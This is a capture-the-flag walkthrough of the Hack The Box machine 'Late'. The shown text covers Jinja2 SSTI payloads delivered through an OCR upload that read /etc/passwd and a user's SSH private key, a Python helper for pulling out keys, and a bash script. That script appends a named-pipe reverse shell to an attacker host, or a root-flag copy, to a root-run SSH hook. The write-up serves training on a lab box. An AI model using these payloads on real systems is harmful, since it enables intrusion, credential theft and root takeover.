🕑Late

Link: https://app.hackthebox.com/machines/463

Nmap Scan

Let's start enumerating with Nmap: nmap -sS -A -sC -sV -T5 -oN scan.txt 10.129.132.140 (-A already implies -sC and -sV; -T5 is fast but can miss ports over a laggy VPN, so fall back to -T4 if the results look thin)

Ports 22 (SSH) and 80 (HTTP) are open.

Let's visit that in our browser

Port 80

[screenshot: port 80]

The site itself doesn't offer much.

I found one link in the source code.

[screenshot: source code]

To visit that page we have to map images.late.htb to the target's IP in our hosts file.

[screenshot: /etc/hosts]

After adding the machine's IP and the images.late.htb name to /etc/hosts we are good to go.

[screenshot: images.late.htb]

This page converts an uploaded image to text (OCR). Let's upload an image and check the response.

[screenshot: image with normal text]

The output 👇

Here we can see that it has extracted the text from the image.

The image-to-text only recognises some fonts. I am currently using MS Word with the Bahnschrift font in landscape orientation; if this does not work, try changing the font and size.

The page heading mentions "flask" (information disclosure). Flask renders templates with Jinja2, and a Flask app that drops user-controlled text into a template string is a classic SSTI target, so that is the first thing to test.

Let's upload an image containing the SSTI probe {{7*7}} and check whether it comes back evaluated.

Yes! The response shows 49 instead of the literal {{7*7}}, so the OCR output is rendered as a template: it's vulnerable to SSTI.

For background on SSTI in Flask/Jinja2 see https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee

Let's try {{config.items()}} to dump the Flask configuration (secret keys and database credentials often live there).

Response 👇

But nothing useful turned up in the config.

Let's read /etc/passwd so we can get the usernames.

Use the payloads listed here https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2 (Jinja2 - Read Remote file)

After trying many payloads this one worked: {{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} (get_flashed_messages is a plain Python function that Flask exposes in the template context; its __globals__ give us the module's __builtins__ and therefore open(), without naming any class).

[screenshot: passwd payload]

the response 👇

So we have the user we need: svc_acc, an account with a login shell.

User Flag

Now we can read the user flag with the same open().read() payload.

[screenshot: user flag payload]

The response 👇

Okay, now we have to figure out how to get a shell.

SSH - Getting Shell

Let's try to read the SSH private key (id_rsa) of the user svc_acc

using this payload: {{ get_flashed_messages.__globals__.__builtins__.open("/home/svc_acc/.ssh/id_rsa").read() }}

[screenshot: id_rsa payload]

The response 👇

Now copy the private key to our machine, stripping the <p> and </p> wrapper. Make sure the file ends with a newline and is readable only by us (mode 600), otherwise ssh refuses to use it.
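Added example, not code from the original writeup: a few helpers for the file-read steps above. It builds the Jinja2 payload (dunders spelled out), strips the <p> wrapper the OCR page puts around its output, picks the accounts with a real login shell out of /etc/passwd, and pulls the private key out of a response and saves it with mode 600. The sample responses are constructed, not captured from the box; the paths are the ones used in this writeup.

```python
"""Helpers for the OCR -> SSTI file-read channel on images.late.htb.
Added example, not from the original writeup. Sample responses are constructed."""
import html
import os
import re

# The OCR page echoes recognised text inside <p>...</p>; rendered Jinja2 output lands there too.
_P_TAG = re.compile(r"</?p>", re.IGNORECASE)
_KEY_BLOCK = re.compile(
    r"-----BEGIN [A-Z ]*PRIVATE KEY-----.*?-----END [A-Z ]*PRIVATE KEY-----", re.S
)


def ssti_probe() -> str:
    """Arithmetic probe: a template engine evaluates it, a plain echo does not."""
    return "{{7*7}}"


def strip_html(response_html: str) -> str:
    """Remove the <p></p> wrapper and decode entities, leaving the raw rendered text."""
    return html.unescape(_P_TAG.sub("", response_html)).strip()


def is_ssti(response_html: str) -> bool:
    """True when the probe came back evaluated (49) instead of echoed verbatim."""
    body = strip_html(response_html)
    return "49" in body and ssti_probe() not in body


def file_read_payload(path: str) -> str:
    """Jinja2 payload from the writeup, with the dunder names spelled out.

    get_flashed_messages is an ordinary Python function Flask places in the
    template context; any function's __globals__ holds its module's
    __builtins__, so open() is reachable without naming a single class.
    """
    if '"' in path or "\n" in path:
        raise ValueError("path must not contain quotes or newlines")
    return '{{ get_flashed_messages.__globals__.__builtins__.open("%s").read() }}' % path


def login_users(passwd_text: str) -> list:
    """Account names from /etc/passwd whose login shell is a real shell (*sh)."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6].endswith("sh"):
            users.append(fields[0])
    return users


def extract_private_key(response_html: str) -> str:
    """Pull the key block out of the response; ssh wants LF endings and a final newline."""
    match = _KEY_BLOCK.search(strip_html(response_html))
    if not match:
        raise ValueError("no private key block in response")
    return match.group(0).replace("\r\n", "\n") + "\n"


def save_private_key(key: str, path: str) -> None:
    """Write the key with mode 600 from the start; ssh -i refuses a group/world-readable key."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(key)
    os.chmod(path, 0o600)  # in case the file already existed with wider permissions


# Constructed sample responses (not captured from the box) for a stand-alone run.
SAMPLE_PASSWD_RESPONSE = (
    "<p>root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "svc_acc:x:1000:1000::/home/svc_acc:/bin/bash\n"
    "sshd:x:109:65534::/run/sshd:/usr/sbin/nologin\n</p>"
)
SAMPLE_KEY_RESPONSE = (
    "<p>-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "b3BlbnNzaC1rZXktdjEAAAAA(constructed placeholder, not a real key)\n"
    "-----END OPENSSH PRIVATE KEY-----\n</p>"
)

if __name__ == "__main__":
    print(file_read_payload("/etc/passwd"))
    print(is_ssti("<p>49</p>"))
    print(login_users(strip_html(SAMPLE_PASSWD_RESPONSE)))
    print(extract_private_key(SAMPLE_KEY_RESPONSE))
```

The payload builder rejects quotes and newlines in the path because they would break out of the string literal inside the template; with OCR as the delivery channel you also want a large monospace font, since braces and underscores are what the recogniser most often mangles.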

[screenshot: ssh login as svc_acc]

We are in!

Privilege Escalation

Let's copy linpeas.sh to the machine with scp.

[screenshot: scp]

Let's run linpeas.sh

linpeas flags an interesting script in /usr/local/sbin that runs with root privileges.

[screenshot: linpeas.sh output]

Let's check ssh-alert.sh

[screenshot: ssh-alert.sh]

It looks like this runs whenever a user connects over SSH.

If it runs as root and we can write to it, we can modify it to get the root flag.

Let's confirm that it executes as root. We can use pspy64, which is already present on the machine.

Now log in again over SSH from another terminal. pspy shows ssh-alert.sh running with UID=0, which means it runs with root permissions.

There are two ways to get the root flag.

Method 1 - With rev shell

Let's check whether nc is available on the machine.

nc -h

Okay, nc is there. We can simply append a reverse-shell one-liner to ssh-alert.sh.

Now set up a listener in another terminal: nc -lnvp 9004

Log in again over SSH as svc_acc to trigger the script. Boom! We get a reverse shell on our listener, and we are root!

Method 2 - Copying root.txt to our unprivileged user

We can just have the script cat root.txt into a file owned by svc_acc, without any reverse shell:

1. Create a flag.txt file under /home/svc_acc/ (creating it first means it is owned by svc_acc; root's redirect then writes into the existing file and we can read it).

2. Append a cat command that reads /root/root.txt into that file to ssh-alert.sh.

3. Log in again over SSH as svc_acc to trigger the script.

4. Check the flag.txt we created in /home/svc_acc.

[screenshot: root.txt]
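Added example, not from the original writeup: a small script that packages both methods above, with the checks a practitioner would run first. It assumes the hook is /usr/local/sbin/ssh-alert.sh and is writable by svc_acc (as linpeas reported), uses a placeholder attacker address for LHOST, writes the flag copy to /home/svc_acc/flag.txt, and uses a named-pipe reverse shell instead of nc -e so it works with nc builds that lack -e. The id check is an alternative to pspy for confirming the hook runs as root.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup. Builds the lines to append to the
# root-run SSH hook and does the sanity checks first. Assumptions: the hook is
# /usr/local/sbin/ssh-alert.sh and is writable by svc_acc (as linpeas reported);
# LHOST is a placeholder attacker address; the flag copy goes to /home/svc_acc/flag.txt.
HOOK="${HOOK:-/usr/local/sbin/ssh-alert.sh}"
LHOST="${LHOST:-10.10.14.5}"      # placeholder, replace with your VPN address
LPORT="${LPORT:-9004}"
FLAG_OUT="${FLAG_OUT:-/home/svc_acc/flag.txt}"

# A hook we cannot write is no use; check before doing anything else.
hook_writable() { [ -w "$1" ]; }

# Cheap alternative to pspy: make the hook log who it runs as on the next login.
id_check_line() { printf 'id >> /tmp/hook_id.log\n'; }

# Method 1: reverse shell via a named pipe, which works with nc builds that lack -e.
revshell_line() {
  printf 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc %s %s > /tmp/f\n' "$1" "$2"
}

# Method 2: copy the flag out and hand ownership to the low-privileged user.
flagcopy_line() {
  printf 'cat /root/root.txt > %s; chown svc_acc %s; chmod 600 %s\n' "$1" "$1" "$1"
}

# Append one line to the hook, keeping a backup so it can be restored afterwards.
append_to_hook() {
  local hook="$1" line="$2"
  cp -p "$hook" "$hook.bak" 2>/dev/null || true
  printf '\n%s\n' "$line" >> "$hook"
}

# Usage: ./hook.sh check | revshell | flag   (nothing runs when no argument is given)
case "${1:-}" in
  check)    hook_writable "$HOOK" || { echo "$HOOK is not writable" >&2; exit 1; }
            append_to_hook "$HOOK" "$(id_check_line)"
            echo "appended id check: log in again over ssh, then cat /tmp/hook_id.log" ;;
  revshell) append_to_hook "$HOOK" "$(revshell_line "$LHOST" "$LPORT")"
            echo "listener: nc -lnvp $LPORT, then log in again over ssh" ;;
  flag)     append_to_hook "$HOOK" "$(flagcopy_line "$FLAG_OUT")"
            echo "log in again over ssh, then cat $FLAG_OUT" ;;
esac
```

Run it with check first: if /tmp/hook_id.log shows uid=0 after the next SSH login, the hook really does run as root and either revshell or flag will work. The .bak copy is there so the hook can be put back once the flag is read; leaving a reverse shell in a login hook on a shared box is bad manners.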

BOOM! Pwned!

Thanks for reading. Hope you have enjoyed and learned something.

For any questions feel free to ping me on Twitter or LinkedIn
